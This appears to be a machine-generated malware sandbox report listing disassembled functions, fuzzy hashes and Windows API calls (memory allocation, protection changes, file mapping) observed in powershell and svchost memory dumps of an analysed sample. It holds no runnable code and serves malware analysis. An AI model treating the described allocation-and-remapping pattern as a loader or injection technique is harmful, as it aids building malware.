                                                                                                                    • Instruction ID: bc12a54ee7f2a3968c8d645b773398688ff741aca33fdb88ede29b3dc450d3ca
                                                                                                                    • Opcode Fuzzy Hash: b103a978f05b4717cf56d56464acbf8fbe9f2b1b24c9aee48b9da11a60a9370c
                                                                                                                    • Instruction Fuzzy Hash: A7F0B775A001159FCB15CB9CD990AEEF7B1FF88324F208159E515A72A1C736A852CB51
                                                                                                                    Function 07DB3231 Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 174eea590974b809762912d7702731563813ffdfc6b92ff72ed3b2a1c64fd4b0
                                                                                                                    • Instruction ID: 9c1ffcd1acb7587e5f93364f2a8ca1c4ab23014e79aa14a2cbe13661dedd0ce0
                                                                                                                    • Opcode Fuzzy Hash: 174eea590974b809762912d7702731563813ffdfc6b92ff72ed3b2a1c64fd4b0
                                                                                                                    • Instruction Fuzzy Hash: B0E0CDF1300343DBC6248A05C844C51F751FFD1519F09C09E55060F596D623E941EB40

                                                                                                                    Non-executed Functions

                                                                                                                    Function 04F2224E Relevance: .0, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 28673d300b1027660dd33adc4fc18a55d31c79f5645e8514fc2beaee1f355f08
                                                                                                                    • Instruction ID: 73c5d054f1a0807f0dc633db899dd59aa027cb4aa6021cfb048bad83a02c5e82
                                                                                                                    • Opcode Fuzzy Hash: 28673d300b1027660dd33adc4fc18a55d31c79f5645e8514fc2beaee1f355f08
                                                                                                                    • Instruction Fuzzy Hash: C6A01264C58024C5D83088480810050B390672E6217540200E47003390520442159429
                                                                                                                    Function 07DB2AF0 Relevance: 15.4, Strings: 12, Instructions: 450COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-879563280
                                                                                                                    • Opcode ID: 5b4ddf6c4fdb93331a0968c4859f3029d5d0db6f84141feabdb77a5340378ff8
                                                                                                                    • Instruction ID: 47c40ad16a5ca107cc197e524089bf4b5b4d25756b4c1fdad85a858adbd068da
                                                                                                                    • Opcode Fuzzy Hash: 5b4ddf6c4fdb93331a0968c4859f3029d5d0db6f84141feabdb77a5340378ff8
                                                                                                                    • Instruction Fuzzy Hash: 61E118B2B04206DFCB359E6AC8146EAFBE1FF85310F1484AAD446CF265DB35E845C7A1
                                                                                                                    Function 07DB2410 Relevance: 12.8, Strings: 10, Instructions: 283COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3512890053
                                                                                                                    • Opcode ID: 8828bd95627097eb84303af3096de3d80a2f9e8c8abf81c492450757d9bf44c0
                                                                                                                    • Instruction ID: 00b0fc96b1ab23f880e5bed845f25b7b82e75cc1f5326283c528605f84529819
                                                                                                                    • Opcode Fuzzy Hash: 8828bd95627097eb84303af3096de3d80a2f9e8c8abf81c492450757d9bf44c0
                                                                                                                    • Instruction Fuzzy Hash: B69147B2B0430ACFCB354A69C8546EAFBE5BF8A310F14846AD446CF251DF35E985C761
                                                                                                                    Function 07DB90A8 Relevance: 11.6, Strings: 9, Instructions: 369COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2740984363
                                                                                                                    • Opcode ID: 63d96dd55fff86846f861303594170e7328960e636293de36e2f43e2ec51fbcc
                                                                                                                    • Instruction ID: d091c9e082da0f8429739dce72841aa94308727905251951a7c11cc18163f072
                                                                                                                    • Opcode Fuzzy Hash: 63d96dd55fff86846f861303594170e7328960e636293de36e2f43e2ec51fbcc
                                                                                                                    • Instruction Fuzzy Hash: 88C15CB1B04396CFD7354B6898247AAFBE1AFC2310F14846AD646CF391DA35E845C7A1
                                                                                                                    Function 07DB5020 Relevance: 10.5, Strings: 8, Instructions: 492COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3732357466
                                                                                                                    • Opcode ID: fe38ffde9749922a1c63b1a52edb80f20581fc8dab29f3838e159b02b58d1cbf
                                                                                                                    • Instruction ID: 65adc4f682cdced975b59954bdf5c8a665a3e9c20e5adfd45981a1b3cf2e666f
                                                                                                                    • Opcode Fuzzy Hash: fe38ffde9749922a1c63b1a52edb80f20581fc8dab29f3838e159b02b58d1cbf
                                                                                                                    • Instruction Fuzzy Hash: 7CF14871B04346DFCB358F79E8406AAFBE6AF86211F2884AAD447CF351DA31C855C7A1
                                                                                                                    Function 07DBD524 Relevance: 9.0, Strings: 7, Instructions: 202COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                                                    • API String ID: 0-1710924510
                                                                                                                    • Opcode ID: 087700e78b9257ee625b95916968bdeef224e496f2afb3f204b6fa3a5d2de617
                                                                                                                    • Instruction ID: 285188d73271e96523353ee1ec2ac5150d524c9b405936ad385b6487501c08fc
                                                                                                                    • Opcode Fuzzy Hash: 087700e78b9257ee625b95916968bdeef224e496f2afb3f204b6fa3a5d2de617
                                                                                                                    • Instruction Fuzzy Hash: A671A3B4B0021ADFDB348E55C584BEAFBF3AF89711F29845AE8469B290CB31DD41CB51
                                                                                                                    Function 07DBD538 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                                                    • API String ID: 0-1710924510
                                                                                                                    • Opcode ID: 95ddb7da16d41527926b25d545dcecded1ecce867e18724bf950861fad0f2146
                                                                                                                    • Instruction ID: b1b3b412d260442808b8f16a18f49630219fc9519a206e04e65e6b72a9c518bd
                                                                                                                    • Opcode Fuzzy Hash: 95ddb7da16d41527926b25d545dcecded1ecce867e18724bf950861fad0f2146
                                                                                                                    • Instruction Fuzzy Hash: 1B6192B4B0021ADFDB34CE55C544BEAFBF3AB89711F198459E8469B290CB31ED81CB51
                                                                                                                    Function 07DBD1D4 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2461640029
                                                                                                                    • Opcode ID: d656b3789fcf0cdb6985780785c57cb78df20eeab2bf0a260fb6e56516619cbd
                                                                                                                    • Instruction ID: 2d047cccca5cb7a625e6dc3ee0f91b8f13b73c69201172798ebc7a263baf40a1
                                                                                                                    • Opcode Fuzzy Hash: d656b3789fcf0cdb6985780785c57cb78df20eeab2bf0a260fb6e56516619cbd
                                                                                                                    • Instruction Fuzzy Hash: 9A51BFB0B0024ADFDB348E05C544BEAF7A3BF46315F5880AAE8469F291C775EC45CBA1
                                                                                                                    Function 07DBD1E8 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2461640029
                                                                                                                    • Opcode ID: 0ed835150e2b10762d1b53341e5f1cb022e0d7c4c55d707f859700fc19b55e5d
                                                                                                                    • Instruction ID: 96a6f8fb2aa88b0b9b83e1e5bb43f94525ceb841d893ac02fb462e134bd0ca2b
                                                                                                                    • Opcode Fuzzy Hash: 0ed835150e2b10762d1b53341e5f1cb022e0d7c4c55d707f859700fc19b55e5d
                                                                                                                    • Instruction Fuzzy Hash: A2517EB0B0024ADFDB348E05C544BEAF7A3BF45315F5484AAE8069B295C775EC85CBA1
                                                                                                                    Function 07DBCC60 Relevance: 7.7, Strings: 6, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                                                                                                    • API String ID: 0-2098638132
                                                                                                                    • Opcode ID: 39dcc6d6cb277d91713be6a9547d93150d721a91b2bb0e0cdf3c980cb1dcf517
                                                                                                                    • Instruction ID: 4d97b78fbb284b5e69f48269fbad26e2877d29c41bf5cca70140d061de4d5056
                                                                                                                    • Opcode Fuzzy Hash: 39dcc6d6cb277d91713be6a9547d93150d721a91b2bb0e0cdf3c980cb1dcf517
                                                                                                                    • Instruction Fuzzy Hash: BC51B3B5A24206DFDB358F54C550BEAFBE2BF45710F18849AE84A9F291C731E940CBB1
                                                                                                                    Function 07DB1C10 Relevance: 7.6, Strings: 6, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2923853403
                                                                                                                    • Opcode ID: f80d07c2d23f7b1b1615829906f2cdbcd9301516a1b0fb4889696465b2b0145d
                                                                                                                    • Instruction ID: 456507a83df38d29583b45c960ffe6f61925dcbdacae435245087fda9a543d39
                                                                                                                    • Opcode Fuzzy Hash: f80d07c2d23f7b1b1615829906f2cdbcd9301516a1b0fb4889696465b2b0145d
                                                                                                                    • Instruction Fuzzy Hash: AA417FB1B4021EDFC7381A6594203BAFBD6AFC6610F64497AD4478F259DF37C8498351
                                                                                                                    Function 07DBDBDC Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3997570045
                                                                                                                    • Opcode ID: 11ca7354ea5772042ba9bd9a92bf6dc588c8a9de435a78f7547683f0182997a9
                                                                                                                    • Instruction ID: 6c82f926b05655f55616972dac30c76ee7fb442e081bfdf8be395ed04570e283
                                                                                                                    • Opcode Fuzzy Hash: 11ca7354ea5772042ba9bd9a92bf6dc588c8a9de435a78f7547683f0182997a9
                                                                                                                    • Instruction Fuzzy Hash: 2461D4F071020ADFDB388E55C544BFAF7A3AF49311F598465E8865B294CB71ED80CBA1
                                                                                                                    Function 07DBDBF0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3997570045
                                                                                                                    • Opcode ID: 3f227378796b923fee3ee581566689801e311c0d254ee63bce45a7f8b735e8f2
                                                                                                                    • Instruction ID: 764754bbba3dacc55e6dd2ca5584d2a493d63b1d12d1a3cf1de8e418f592e48c
                                                                                                                    • Opcode Fuzzy Hash: 3f227378796b923fee3ee581566689801e311c0d254ee63bce45a7f8b735e8f2
                                                                                                                    • Instruction Fuzzy Hash: 0D61C2F071020ADFDB388E55C544BFAF7A3AF49711F588469E8865B294CB71ED80CBA1
                                                                                                                    Function 07DB9850 Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-578306960
                                                                                                                    • Opcode ID: 7cb0fecc74747657e7a2e0500857b3b830d785c7ecc79f240ef06d7117fc81ca
                                                                                                                    • Instruction ID: 242d80282d346cee0db82c089a22e72c367b9944fac1c3be099a2d7d1b0bd791
                                                                                                                    • Opcode Fuzzy Hash: 7cb0fecc74747657e7a2e0500857b3b830d785c7ecc79f240ef06d7117fc81ca
                                                                                                                    • Instruction Fuzzy Hash: AD313B76708345CFD7255F79D8246A6FBE5AF82620B2484AFE546CF361CA32EC44C351
                                                                                                                    Function 07DB85E0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3997570045
                                                                                                                    • Opcode ID: 3f53eff5a050ab48a1b123b6bf4fbd33356b59bb1184964295381fc0f3618da1
                                                                                                                    • Instruction ID: 88a0a1935e760b01221b177c7e0ee00241a3606c2feb05dc6ddcd13c34661123
                                                                                                                    • Opcode Fuzzy Hash: 3f53eff5a050ab48a1b123b6bf4fbd33356b59bb1184964295381fc0f3618da1
                                                                                                                    • Instruction Fuzzy Hash: B231B5B1E10206DBDB348E05C544BE9F7E9AB49714F1480A9D4975F290CB72D880DBD1
                                                                                                                    Function 07DBCDA6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                                                                    • API String ID: 0-3846404929
                                                                                                                    • Opcode ID: 9981b0280a656063abdf05e86badd9fdb70bf5c65ce38950928186d6b26dfcdf
                                                                                                                    • Instruction ID: 07ddd447d9536ab7ca051bcb6c563f0f9a4a64ac7e8d5b3e680c2a687402ac16
                                                                                                                    • Opcode Fuzzy Hash: 9981b0280a656063abdf05e86badd9fdb70bf5c65ce38950928186d6b26dfcdf
                                                                                                                    • Instruction Fuzzy Hash: FF31B3B0B10215DFCB28DF94C444A9AFBE2BB48B10F248559E80EAB350C731ED41CBA1
                                                                                                                    Function 07DBDFA4 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: XRcq$XRcq$tP^q$$^q
                                                                                                                    • API String ID: 0-3596674671
                                                                                                                    • Opcode ID: f45c31ed84efc2ddbd4a5a8b10d7e5e26abe85eb6adb8085c30f4b223ac2c74d
                                                                                                                    • Instruction ID: d108f44a30fd7527f88a1d4f28c3d9afc26ec2660549081b3127b25378a36386
                                                                                                                    • Opcode Fuzzy Hash: f45c31ed84efc2ddbd4a5a8b10d7e5e26abe85eb6adb8085c30f4b223ac2c74d
                                                                                                                    • Instruction Fuzzy Hash: F941B2B0A04205DFDB34CF59C144AEAFBF2AF89750F69C199E8066B295C732DD41CBA1
                                                                                                                    Function 07DBDFB8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: XRcq$XRcq$tP^q$$^q
                                                                                                                    • API String ID: 0-3596674671
                                                                                                                    • Opcode ID: d946f3a3d35684d00a8b7368dd66d23005b3b1a70e15546d2f1e7f0659d6d47d
                                                                                                                    • Instruction ID: 2b17b62b9cf5e51df407d73027f813b047222cd7935e0d1ce72204e18b64b10d
                                                                                                                    • Opcode Fuzzy Hash: d946f3a3d35684d00a8b7368dd66d23005b3b1a70e15546d2f1e7f0659d6d47d
                                                                                                                    • Instruction Fuzzy Hash: 674194B0A00215DFDB34CF49C544AEAFBF2AF89711F69C1A9E8066B255C731DD41CBA0
                                                                                                                    Function 07DB0E08 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 95efc21b1b43cfd354391241ea72f0863cab973669d644085267fe5eaf87bcd3
                                                                                                                    • Instruction ID: 03396d255ca1da15b69b3d10c991426ef2e50e656c7fdebfc808aefcf413e2a4
                                                                                                                    • Opcode Fuzzy Hash: 95efc21b1b43cfd354391241ea72f0863cab973669d644085267fe5eaf87bcd3
                                                                                                                    • Instruction Fuzzy Hash: 00216B7170030EDBD73455B99C40BABE6DA9BC1711F24882AE54BCF395DD36C8418361
                                                                                                                    Function 07DB8870 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 59c347fa36ae209568bdb23030158cdba4e4686c5dd9c14589e19dd5366ebe71
                                                                                                                    • Instruction ID: bf4d27216182b236cfa050e74dcdc8648225d6e607613aaa024e6a5bcfe4acea
                                                                                                                    • Opcode Fuzzy Hash: 59c347fa36ae209568bdb23030158cdba4e4686c5dd9c14589e19dd5366ebe71
                                                                                                                    • Instruction Fuzzy Hash: 4F11DFB9E0030ADBDF348E65D8006EAF7F8BB85250F18406AD84A8B201DB31E545EBD3

                                                                                                                    Executed Functions

                                                                                                                    Function 001E02D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 001E0326
                                                                                                                      • Part of subcall function 001E00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 001E00CD
                                                                                                                      • Part of subcall function 001E00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 001E0279
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 001E0378
                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 001E03E7
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 001E0407
                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 001E042E
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 001E0456
                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 001E0471
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000003.2013850947.00000000001E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_3_1e0000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                    • String ID: ,
                                                                                                                    • API String ID: 3867569247-3772416878
                                                                                                                    • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                    • Instruction ID: 86caca26e8e2b200ca08c2663fc00f2991fa5c6489a1dbce89e14800847275ac
                                                                                                                    • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                    • Instruction Fuzzy Hash: 41612DB1900649EFDB21DFA5C984ADEBBB9FF08350F14851AFA59A7240D770E980CB60
                                                                                                                    Function 001E00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 001E00CD
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 001E0279
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000003.2013850947.00000000001E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_3_1e0000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2087232378-0
                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                    • Instruction ID: 11b12facc98a63b94c9e675335142a20b6b8d0f528326f53f6b25357153a14b7
                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                    • Instruction Fuzzy Hash: 9371A971A0468ADFCB46CF99C885BEDBBF0AB09314F284095E561FB241C374AA81DF64

                                                                                                                    Non-executed Functions

                                                                                                                    Function 001E0283 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000003.2013850947.00000000001E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_3_1e0000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                    • Instruction ID: 2603587573d2fa70e8109eeb6b893986b4ad79312e72c396177ca9f94e6167dd
                                                                                                                    • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                    • Instruction Fuzzy Hash: A0F0C275A01A41CF8B1ACF4AC58CC9977F6FB98710B254495D504EB261D3F0DDC4C750

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:23.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:45%
                                                                                                                    Total number of Nodes:20
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 418 13e03301cf4 420 13e03301d19 418->420 419 13e03301fa1 420->419 427 13e033015c0 420->427 422 13e03301f98 CloseHandle 422->419 423 13e03301f88 NtAcceptConnectPort 423->422 424 13e03301e3a 424->422 424->423 430 13e03301aa4 424->430 426 13e03301f76 426->423 429 13e033015f4 NtAcceptConnectPort 427->429 429->424 431 13e03301aef 430->431 433 13e03301b10 431->433 434 13e03301870 431->434 433->426 436 13e03301889 434->436 435 13e03301949 435->433 436->435 437 13e03301930 GetProcessMitigationPolicy 436->437 437->435 438 13e033019b4 439 13e033019c7 438->439 440 13e033019e6 VirtualFree 439->440 441 13e033019fb 439->441 440->441

